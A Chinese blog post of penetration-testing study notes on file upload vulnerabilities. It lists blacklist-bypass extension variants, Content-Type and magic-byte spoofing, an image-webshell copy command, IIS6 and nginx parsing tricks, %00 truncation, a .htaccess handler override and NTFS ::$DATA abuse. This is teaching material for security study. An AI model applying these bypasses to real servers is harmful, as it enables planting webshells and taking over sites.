文件上传漏洞

最新推荐文章于 2024-09-02 10:23:11 发布
最新推荐文章于 2024-09-02 10:23:11 发布
阅读量184 收藏
点赞数
分类专栏: 暗月笔记 文章标签: php 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rmc131/article/details/129927739
版权

文件上传漏洞

文件上传过程

客户端选择发送的文件–>服务器接收–>网站程序判断–>临时文件–>移动到指定的路径

文件上传错误码

0:成功

1:文件大小超过php.ini中upload_max_filesize选择限制的值

2:文件大小超过了HTML表单中MAX_FILE_SIIZE选项指定的值

3:文件只有部分被上传

4:没有文件被上传

网站常见后缀名

asp、asa、cdx、cer、php、aspx、ashx、php3、php.a、shtml、phtml、htm

过滤的时候可以传入aspasp、phpphp

大小写转换

造成漏洞的原因

  • 程序代码和系统缺陷
    • 文件可以直接上传
    • js脚本限制,禁止js文件运行
    • 黑名单过滤不全,穷举后缀名
      • 黑名单:asp、asa、cdx、cer、php、aspx、ashx
      • 白名单:jpg、png、gif等
    • 文件名可控,后缀名不可控,iss6.0解析漏洞

文件名未做任何限制

可以任意上传文件

客户端js验证绕过

查看浏览器控制台Network,上传非法文件时报错Network没有显示,即为js验证。

绕过

  • 简单的控制台修改一下html代码,绕过js检查type="button"直接改为type=",再把 onclick="return check_file();" 删除即可。
  • 上传图片,抓包,把图片数据改为代码,文件名相应更改,即可上传。

黑白名单绕过

黑名单是禁止上传后缀,白名单允许上传,实际应用中黑名单为主。

网站文件上传后缀字典,可以再修改,更改大小写,随即大小写之类

php
php2
php3
php4
php5
pHp
pHp2
pHp3
pHp4
pHp5
html
htm
phtml
pht
Html
Htm
pHtml
asp
aspx
asa
asax
ashx
asmx
cer
aSp
aSpx
aSa
aSax
aScx
aShx
aSmx
cEr
jsp
jspa
jspx
jsw
jxv
jspf
jtml
JSp
jSpx
jSpa
jSw
jSv
jSpf
jHtml
asp/test.jpg
asp;.jpg
cer/test.jpg
cer;.jpg
asa/test.jpg
asa;.jpg
aSp/test.jpg
aSp;.jpg
cEr/test.jpg
cEr;.jpg
aSa/test.jpg
aSa;.jpg
jpg/xx.php
jpg/xx.pHp
jpg/.php
jpg/.pHp
php.xs.aa
php2.aa
php3.aa
php4.aa
php5.aa
pHp.aa
pHp2.aa
pHp3.aa
pHp4.aaa
pHp5.aa
html.aa
htm.aa
phtml.aa
pht.aaa
Html.aaa
Htm.aa
pHtml.aa
php::$DATA
aspasp
phpphps

穷举出可以成功上传的文件后缀

content-type检测突破上传

抓包,修改http文件类型

常见图片类型:image/pjpeg,image/bmp,image/gif,image/x-png,image/jpeg,image/jpg

例如:Content-Type: image/pjpeg

文件头检测突破上传

JPEG(jpg):FFD8FF

PNG(png):89504E47

TIFF(tif):47492A00

Windows Bitmap(bmp):424D

GIF(gif):474946

文件头修改

制作图片一句话

copy 1.gif/b + 2.php shell.php

IIS6.0文件名解释漏洞

文件名可控,后缀名不可控

rick.asp;.jpg rick.asp;jpg(适情况选择)

抓包改文件名,顺手改了文件类型,直接访问rick.asp;.jpg可以成功(php同理)。

目录解析漏洞

文件夹名为asp、cer、asa、cdx结尾,如xxx.asp,这样文件夹下的asp

例子:

在xx.asp文件夹下都是以asp文件解析

抓包,改filepath,改content-type,改文件后缀,send,得到xxxx.jpg

即使是.asp文件也一样可以连接webshell

%00截断

  • 直接截断文件名
  • 创建可控目录,%00截断创建目录,利用IIS6.0解析漏洞上传
  • 截断参数

例子:rick.php%00.jpg,把%00进行URL解码

也可通过更改默认文件名的开头,截断后面的文件名内容,参数c改为rick.%00

条件:PHP<5.3.29,且GPC关闭

重写解析

此漏洞环境:

phpstudy2018搭建网站
php5.6以下不带nts的版本

apache开启了重写模块

LoadModule rewrite_module modules/mod_rewrite.so

重写解析 .htaccess

<FileMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

上传一句话图片马,访问可以成功

系统特性突破上传

系统特性

一般上传时防火墙会做拦截,

冒号:,rick.php:.jpg上传生成的是名为rick.php空白文件

利用php和windows系统的叠加特性,以下符号在正则匹配时的相等性

双引号"=.

大于号>=?ss

小于号<=*

文件名.<.<<<文件名.>>文件名.>><

前面生成的空白文件,用这种方法就可以写入

NTFS交换数据流

xxx.php:$DATA 创建文件

xxx.php::$DATA 创建和写入

程序逻辑造成双文件

双文件上传:上传时,第一个为jpg第二个为php可以成功上传php(俩堆了一起,按前面的处理)

空格文件上传:抓包,在文件名后加空格

配置错误

  • 1.jpg/php

IIS7.0/IIS7.5/nginx开启fast-cqi

  • /2.jpg%00php

nginx <= 0.83

补充

windows会把文件最后一个点自动去掉

RICKC131
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
上传后缀绕过
12-13
在上传的限制不能上传某些的后缀,对于上传中各绕过的描述
aspx写cs后台代码(突破上传过滤一招,利用ashx)
jelenyoung的专栏
06-17 4479
http://www.2cto.com/Article/201302/188962.html 前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧, 正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。   用自动扫描脚本扫描出敏感目录 inc/ewebeditor/admin_login.asp 既然有ewebeditor编辑器那就尝试下
aspx 中轻松实现文件上传
图像识别讨论学习
08-10 3391
aspx 中轻松实现文件上传在aspx中实现文件上传是非常容易的,如下代码:private string upLoadFile(System.Web.UI.HtmlControls.HtmlInputFile tFile,string FilePath){ if(tFile.PostedFile.ContentLength>0 ) {  string strFileName = Path.GetF
01文件上传漏洞黑名单检测篇)
jayq1的博客
03-15 776
关于web安全文件上传漏洞知识分享
奇安信代码卫士,文件上传漏洞解决demo
04-23
奇安信代码卫士,文件上传漏洞解决demo; #### 文件上传可以参考以下安全需求进行处理: 1. 服务器配置: (1)将上传目录和上传文件设置为不可执行, 杜绝脚本执行。 (2)应保证服务器安全,避免文件解析漏洞。 2....
计算机网络安全中文件上传漏洞及防御措施.pdf
09-19
计算机网络安全中文件上传漏洞及防御措施 计算机网络安全中文件上传漏洞是一种常见的Web安全漏洞,攻击者可以通过上传恶意代码的文件来获取服务器的控制权。为了防御这种攻击,需要对文件上传进行严格的校验检测,...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
ASPX文件上传并限制文件类型实例,ASP.NET源码
12-19
摘要:.NET源码,上传下载,文件上传   ASPX文件上传并限制文件类型的ASP.NET源码实例,上传程序将上传文件类型限制为".jpg", ".gif", ".bmp", ".jpeg"四种类型,除此这外的任何类型,都将提示“该文件类型不允许上传”。   作者寄语:貌似在codefans没看到限制文件类型的例子,于是简单写了个帮助下新手,支持codefans (文件解压缩密码 www.haobo1888.com)
web安全技术-实验六、文件上传漏洞.doc
08-20
文件上传漏洞】是Web应用安全领域中的一个重要概念,它主要出现在允许用户上传文件服务器的应用程序中。当系统没有正确地验证或过滤上传的文件类型时,攻击者可以利用这个漏洞上传恶意代码,例如病毒、木马或者...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
【学习笔记】文件上传绕过
chualam的博客
11-16 389
一般防御:JavaScript(直接禁用就好) content-type: image/gif (抓包改包) 文件内容头(GIF89a)利用copy命令把图片和木马结合 木马头加上内容头就可以了 后缀名黑白名单(大小写绕过,能被解析的扩展名列表jsp jspx jspf asp asa cer aspxphp php php3 php4exe exee,) 配合文件包含漏洞(先上传一个包含恶意php代码的图片或者txt,有些waf只会对动态语言的页面进行验证) 文件名解析漏洞(test.asp.   tes
文件上传漏洞篇02任意文件上传漏洞方法和攻击方法
qq_61861243的博客
04-16 918
头像上传、修改上传,文件编辑器中文件上传、图片上传、媒体上传。举例:通过抓包上传恶意文件进行测试,上传后缀名为asp、php、aspx等动态语言脚本,查看上传时返回的信息,判断是否能直接上传,如果不能直接上传,再进行此时上传突破。(例如:上传文件的时候只允许图片格式 的后缀,但修改文件却没有限制后缀名,图片文件就可以修改成php文件,就有可能访问这个文件的URL(网址)直接getshell(获取),控制网站。
shell 免杀aspx_[9期]软WAF上传绕过+webshell免杀
weixin_42311335的博客
12-31 262
安全狗上传绕过思路:1.扰乱编码form-data 替换成 ~form-data form-data 改成f+orm-dataform-data 改成form-d+ata form-data 替换成 "filename="xxx" 改成filename=xxx;增减空格对Content-Disposition,Content-T...
文件上传漏洞asp、php、jsp、aspx如何绕过黑名单
niqiu320的博客
04-27 3516
文件上传漏洞asp、php、jsp、aspx如何绕过黑名单 脚本语言 绕过方式 asp .php/.php5/.php4/.php3/.php2/php1/.html/.htm/.phtml/.pHp/.pHp5/.pHp4/.pHp3/.pHp2/.pHp1/.Html/.Htm/.pHtml php .jsp/.jspa/.jspx/.jsw/.jsv/.jspf/.jtml/.jSp/.jSpx/.jSpa/.jSw/.jSv/.jSpf/.jHtml jsp .asp/.as
.net 文件上传 刷新aspx页面 showModalDialog 模态打开子窗体,返回值到父窗体 等
skybot的专栏
06-17 3000
封装变化(Part One)    软件设计最大的敌人,就是应付需求不断的变化。变化有时候是无穷尽的,于是项目开发就在反复的修改、更新中无限期地延迟交付的日期。变化如悬在头顶的达摩克斯之剑,令许多软件工程专家一筹莫展。正如无法找到解决软件开发的“银弹”,要彻底将变化扼杀在摇篮之中,看来也是不可能完成的任务。那么,积极地面对“变化”,方才是可取的态度。于是,极限编程(XP)的倡导
PHP高效进销存管理系统智能管理库存销售与采购系统小程序源码
最新发布
2401_84413795的博客
09-02 404
在这个快速发展的时代,企业要想在激烈的市场竞争中脱颖而出,就必须不断提升自身的运营效率和管理水平。高效进销存管理系统正是你实现这一目标的有力武器。它以其智能、高效、便捷的特点,帮助你轻松驾驭库存、销售与采购三大环节,引领你的企业迈向更加辉煌的未来!
文件上传漏洞详解:安全与对策
"File in the hole - 文件上传漏洞详解与安全防护" 本文档主要探讨的是“File in the hole”——一种文件上传漏洞,该漏洞通常发生在Web应用程序中,允许攻击者通过上传恶意文件来获取对服务器的非法访问权限,甚至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值